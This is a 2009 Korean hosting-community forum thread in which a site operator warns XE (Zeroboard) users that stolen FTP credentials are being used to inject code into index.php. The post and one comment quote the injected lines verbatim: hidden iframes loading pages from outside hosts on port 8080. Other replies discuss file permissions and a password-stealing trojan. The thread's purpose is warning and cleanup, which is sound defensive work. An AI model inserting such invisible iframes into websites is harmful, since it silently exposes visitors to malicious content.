techus qrcode
MEMBER LOGIN

  • Server : Sulinux 2.0
  • Apache/2.0.64 (unix)
  • PHP version 5.2.17
  • Mysql 5.0.92
  • 1차: ns1.techus.net (211.232.13.7)
  • 2차: ns2.techus.net (211.232.13.3)
  • 현재 네임서버 제공 안합니다.
  • 네임서버는 도메인관리업체에서
  • 제공하는 네임서버로 하시고
  • 레코드관리 A : 211.232.13.7 로
  • 설정 하세요.감사합니다.

DNS Powered by DNSEver.com
  • MySQL DB 연결설정 ( http://www.ausangel.org/bbs/

    MySQL DB 연결설정 ( http~

  • 게시글 글등록시 관리자 네이트온으로 알림

    게시글 글등록시 관~

  • 게시판 글등록시 관리자 마이피플로 알림

    게시판 글등록시 관~

  • 선생님 설명입니다..^^

    선생님 설명입니다..^~

  • 테크 모바일을 위한 크롬

    테크 모바일을 위한 ~

  • 3단CSS메뉴 플러그인(멋쟁이님 삽질 빌더용) ”

    3단CSS메뉴 플러그인(~

  1. 1. 뭇쏘 509,500
  2. 2. 아이케 268,835
  3. 3. 예랑맨 182,270
  4. 4. bluewolf 163,255
  5. 5. 청주산의 154,415
  6. 6. 이규하 148,225
  7. 7. 아이슬 119,730
  8. 8. 선장 112,365
  9. 9. 조나단 105,110
  10. 10. SDK 98,895
  1. 1. 청주산의 3346
  2. 2. 아이케 2823
  3. 3. 예랑맨 1611
  4. 4. SDK 1027
  5. 5. 이규하 951
  6. 6. 늑대소냐 726
  7. 7. bluewolf 495
  8. 8. 컴퓨터나라 385
  9. 9. 아이슬 345
  10. 10. 어우름 282
  1. jkwon ♂ 12/27
  2. angel ♂ 12/19
  3. isaac ♂ 5/26
  4. 랩퍼투혼 ♂ 11/24
  5. 노톨릭 ♂ 9/23
  6. wertetrrt ♀ 4/9
  7. 레드 ♂ 3/31
  8. medipara ♂ 3/11
  9. 밥통 ♂ 4/16
  10. 우짜맨 ♂ 1/16
자유게시판 메인 » 자유게시판 » XE 쓰시는분 꼭 읽어주세요!!
 
추천:0 조회:2886

title XE 쓰시는분 꼭 읽어주세요!! [7]

2009-08-07 (금) 22:41 우암 (IP:114.xxx.32)

아이유홀릭 (iuholic.com)이 여러차례 접속이 안되는 문제가 발생했습니다.
사실 청주산의 선생님 도움이 아니였으면 문제도 찾지 못했을뻔 했습니다.;;;;
XE 취약점을 이용한 해킹이 이루어지고 있다고합니다.
제로보드 홈페이지에 올라온 다른 분들 사례로 FTP 접속이 해외에서 이루어지고 index.php 파일이 수정된 기록을 확인했다고 합니다.

홀릭 역시
index.php 파일 하단에
<iframe src="http://nqrl.in:8080/index.php" width=114 height=159 style="visibility: hidden"></iframe>
라는 문구가 3번정도 자동입력되어 접속이 안됬습니다;;
현재 XE에는 이런 사례가 보고된 글들이 몇건씩 올라오고 있구요.
보안패치가 나오지 않으면, 계속해서 위같은 문제가 발생할 것 같습니다.
홈페이지 운영중 접속이 안되시는분은 제일 먼저 index.php 파일을 확인해 보시구요.
소용이 있을지는 모르겠지만, FTP 비밀번호도 수시로 바꿔주는것도 예방 방법중 하나입니다..
index.php침투를 하도 많이 당해서 이제는 귀찮아지네요;;;
어서빨리 취약점 보안 패치가 올라와야 할텐데요...
no character
우암
반갑습니다.
댓글 7개

이름아이콘 청주산의

에궁, 그런 문제가... 09.08.07 23:08

   

이름아이콘 온라

index.php 파일을 644 로 권한을 만들면 접속이 되나요!~^^

제가 회사라.. 확인을 안해봤지만..

그렇게 하면 취약점을 보완할수도 있을거 같은데...???

테스트를 못해봐서리.. 회사는 FTP 를 막아놔서리..ㅋㅋ 09.08.08 00:41

   

이름아이콘 온라

또는 655로는 접속이 가능할지... 아 낼 집에가면 함 테스트 해봐야 겠네요!~~

외국의 툴같은경우는 뭐 물론 설치시에는 707해야겠지만... 나중에 설치후에 보안문제등의 이유로

655나 644등으로 변경하는거 같던데..?? 09.08.08 01:01

   

이름아이콘 NeverOut

회원캐릭터

<iframe src="http://udta.in:8080/index.php" width=188 height=180 style="visibility: hidden"></iframe>
저도 확인해보니 있군요....  얼릉 지워버렸습니다~
지금 권한도 644로 되어 있네요.... 09.08.08 05:12

   

이름아이콘 온라

음... 그렇게 해도 그게 입력이 되는군요... 무셔운거군...^^ 09.08.08 10:02

   

이름아이콘 아이케

네버아웃님은 테크쓰시지 않나요?
테크도 걸리나...;; 09.08.08 11:00

   

이름아이콘 온라

제노바이러스 인걸로 나오네요~^^  일단은 PC 보안문제로 FTP 의 아이디와 비번이 뚤리니.. 당연히..

644 해도 그런현상이 발생하는거 같네요~~ 제노바이러스 체크하시길..^^ 09.08.08 11:09

   

0/3500 secret 파일첨부
FILE #1 .
FILE #2 .
FILE #3 .
FILE #4 .
FILE #5 .
FILE #6 .
FILE #7 .
FILE #8 .
FILE #9 .
FILE #10 .
다중선택옵션 번호 제목 글쓴이 날짜 조회
2172 야외테이블 name icon 청주산의 05-14 (화) 48
2171 1111111111111 name icon 청주산의 04-30 (화) 1
2170 VPN IP 테스트 다시 name icon 청주산의 03-05 (화) 1
2169 ㅎㅎㅎ 아이케 07-01 (월) 4973
2168 봄 입니다... [3] name icon 예랑맨 03-20 (수) 4709
2167 저도 오래간만에 테커스에 방문을 합니다. [2] name icon 선장 12-15 (토) 5721
2166 즐거운 추석명절 되세요. [1] name icon 뭇쏘 09-23 (일) 6695
2165 VPN 테스트 [2] name icon 청주산의 04-22 (일) 6651
2164 감사합니다. [2] name icon 흰구름 04-09 (월) 5399
2163 새해 복 많이 받으세요. [2] name icon 뭇쏘 02-15 (목) 5232
2162 즐거운 한가위 되세요. [2] name icon 뭇쏘 10-04 (수) 5731
2161 mimiart 계정 name icon 청주산의 08-09 (수) 6343
2160 한자 테스트 [1] 아이케 04-13 (목) 6292
2159 오랜만에 옵니다. [1] 컴퓨터나라 04-07 (금) 5921
2158 테크노트가 안들어가지네요;; [5]+1 아이케 03-14 (화) 5597
2157 새해 복 많이 받으세요. [6] name icon 뭇쏘 01-01 (일) 5984
2156 즐거운 성탄 되세요. [3] name icon 뭇쏘 12-24 (토) 5404
2155 11월.. 역사적인 날이 밝다 [2] name icon 예랑맨 11-12 (토) 4204
2154 가을비가 주룩주룩.. [1] name icon 예랑맨 10-25 (화) 4291
2153 완연한 가을입니다 [2] name icon 예랑맨 10-18 (화) 3680